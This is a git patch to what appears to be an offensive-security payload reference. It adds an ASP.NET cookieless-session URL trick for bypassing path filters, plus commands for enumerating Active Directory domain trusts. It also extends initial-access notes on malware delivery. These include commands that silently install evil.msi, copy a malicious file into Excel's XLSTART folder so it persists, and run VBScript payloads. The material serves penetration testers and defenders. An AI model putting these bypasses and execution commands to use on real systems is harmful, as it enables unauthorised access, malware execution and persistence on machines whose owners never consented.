From 7752ff806f6902f0817f1d39c158e85cd4ed8892 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 2 Sep 2023 23:01:10 +0200 Subject: [PATCH] ASPNET Cookieless Bypass --- Directory Traversal/README.md | 20 ++++++++ .../Active Directory Attack.md | 27 ++++++----- Methodology and Resources/Initial Access.md | 46 +++++++++++++++++-- 3 files changed, 77 insertions(+), 16 deletions(-) diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index 5fa1140..2fb50a7 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -13,6 +13,7 @@ * [Double URL encoding](#double-url-encoding) * [UNC Bypass](#unc-bypass) * [NGINX/ALB Bypass](#nginxalb-bypass) + * [ASPNET Cookieless Bypass](#aspnet-cookieless-bypass) * [Path Traversal](#path-traversal) * [Interesting Linux files](#interesting-linux-files) * [Interesting Windows files](#interesting-windows-files) @@ -72,6 +73,7 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings http://domain.tld/page.jsp?include=..;/..;/sensitive.txt ``` + ### Double URL encoding ```powershell @@ -82,6 +84,7 @@ http://domain.tld/page.jsp?include=..;/..;/sensitive.txt **e.g:** Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with `http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini` + ### UNC Bypass An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file. @@ -90,6 +93,7 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software \\localhost\c$\windows\win.ini ``` + ### NGINX/ALB Bypass NGINX in certain configurations and ALB can block traversal attacks in the route, For example: @@ -99,6 +103,21 @@ To bypass this behaviour just add forward slashes in front of the url: ```http://nginx-server////////../../``` +### ASPNET Cookieless Bypass + +When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL by embedding the Session ID directly into it. + +For example, a typical URL might be transformed from: `http://example.com/page.aspx` to something like: `http://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx`. The value within `(S(...))` is the Session ID. + +We can use this behavior to bypass filtered URLs. + +```powershell +/admin/(S(X))/main.aspx +/admin/Foobar/(S(X))/../(S(X))/main.aspx +/(S(X))/admin/(S(X))/main.aspx +``` + + ### Java Bypass Bypass Java's URL protocol @@ -210,3 +229,4 @@ The following log files are controllable and can be included with an evil payloa * [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html) * [NGINX may be protecting your applications from traversal attacks without you even knowing](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381) * [Directory traversal - Portswigger](https://portswigger.net/web-security/file-path-traversal) +* [Cookieless ASPNET - Soroush Dalili](https://twitter.com/irsdl/status/1640390106312835072) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 6c141f4..97ea2d8 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -3422,19 +3422,22 @@ $obj.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$nul ### Enumerate trusts between domains -```powershell -nltest /trusted_domains -``` +* Native `nltest` + ```powershell + nltest /trusted_domains + ``` +* PowerShell `GetAllTrustRelationships` + ```powershell + ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() -or - -```powershell -([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() - -SourceName TargetName TrustType TrustDirection ----------- ---------- --------- -------------- -domainA.local domainB.local TreeRoot Bidirectional -``` + SourceName TargetName TrustType TrustDirection + ---------- ---------- --------- -------------- + domainA.local domainB.local TreeRoot Bidirectional + ``` +* Crackmapexec module `enum_trusts` + ```powershell + cme ldap -u -p -M enum_trusts + ``` ### Exploit trusts between domains diff --git a/Methodology and Resources/Initial Access.md b/Methodology and Resources/Initial Access.md index 32c9916..90a519e 100644 --- a/Methodology and Resources/Initial Access.md +++ b/Methodology and Resources/Initial Access.md @@ -5,7 +5,8 @@ ## Summary * [Complex Chains](#complex-chains) -* [Payloads](#payloads) +* [Container](#container) +* [Payload](#payload) * [Binary Files](#binary-files) * [Code Execution Files](#code-execution-files) * [Embedded Files](#embedded-files) @@ -29,8 +30,31 @@ * **DECOY**: used to continue pretext narration after detonating malware * Typically open PDF files +Examples: +* HTML SMUGGLING(PASSWORD PROTECTED ZIP + ISO(LNK + IcedID + PNG)) used by [TA551/Storm-0303](https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/) -## Payloads + +## Container + +* **ISO/IMG** - can contain hidden files, gets **automounted** giving easy access to contained files (`powershell –c .\malware.exe`) +* **ZIP** - can contain hidden files (locate ZIP + unpack it + change dir + run Malware) +* **WIM** - Windows Image, builtin format used to deploy system features + ```ps1 + # Mount/Unmount .WIM + PS> Mount-WindowsImage -ImagePath myarchive.wim -Path "C:\output\path\to\extract" -Index 1 + PS> Dismount-WindowsImage -Path "C:\output\path\to\extract" -Discard + ``` +* **7-zip, RAR, GZ** - should get a native support on Windows 11 + + +## Trigger + +* **LNK** +* **CHM** +* **ClickOnce** + + +## Payload ### Binary Files @@ -106,10 +130,23 @@ These files can be executed directly on the system without any third party. * Word with Macro (.doc, .docm) * Excel library (.xll) * Excel macro-enabled add-in file (.xlam) + ```ps1 + xcopy /Q/R/S/Y/H/G/I evil.ini %APPDATA%\Microsoft\Excel\XLSTART + ``` * WSF files (.wsf) * MSI installers (.msi) + ```ps1 + powershell Unblock-File evil.msi; msiexec /q /i .\evil.msi + ``` * MSIX/APPX app package (.msix, .appx) -* ClickOnce (.application, .vsto) +* ClickOnce (.application, .vsto, .appref-ms) +* Powershell scripts (.ps1) +* Windows Script Host scripts (.wsh, .vbs) + ```ps1 + cscript.exe payload.vbs + wscript payload.vbs + wscript /e:VBScript payload.txt + ``` ### Embedded Files @@ -148,5 +185,6 @@ In 2022, LAPSUS$ claimed responsibility for a cyberattack on NVIDIA, a major gra * [Top 10 Payloads: Highlighting Notable and Trending Techniques - delivr.to](https://blog.delivr.to/delivr-tos-top-10-payloads-highlighting-notable-and-trending-techniques-fb5e9fdd9356) * [Executing Code as a Control Panel Item through an Exported Cplapplet Function - @spotheplanet](https://www.ired.team/offensive-security/code-execution/executing-code-in-control-panel-item-through-an-exported-cplapplet-function) -* [02. Desperate Infection Chains - Multi-Step Initial Access Strategies by Mariusz Banach](https://youtu.be/CwNPP_Xfrts) +* [Desperate Infection Chains - Multi-Step Initial Access Strategies by Mariusz Banach - x33fcon Youtube](https://youtu.be/CwNPP_Xfrts) +* [Desperate Infection Chains - Multi-Step Initial Access Strategies by Mariusz Banach - x33fcon PDF](https://binary-offensive.com/files/x33fcon%20-%20Desperate%20Infection%20Chains.pdf) * [Red Macros Factory - https://binary-offensive.com/](https://binary-offensive.com/initial-access-framework) \ No newline at end of file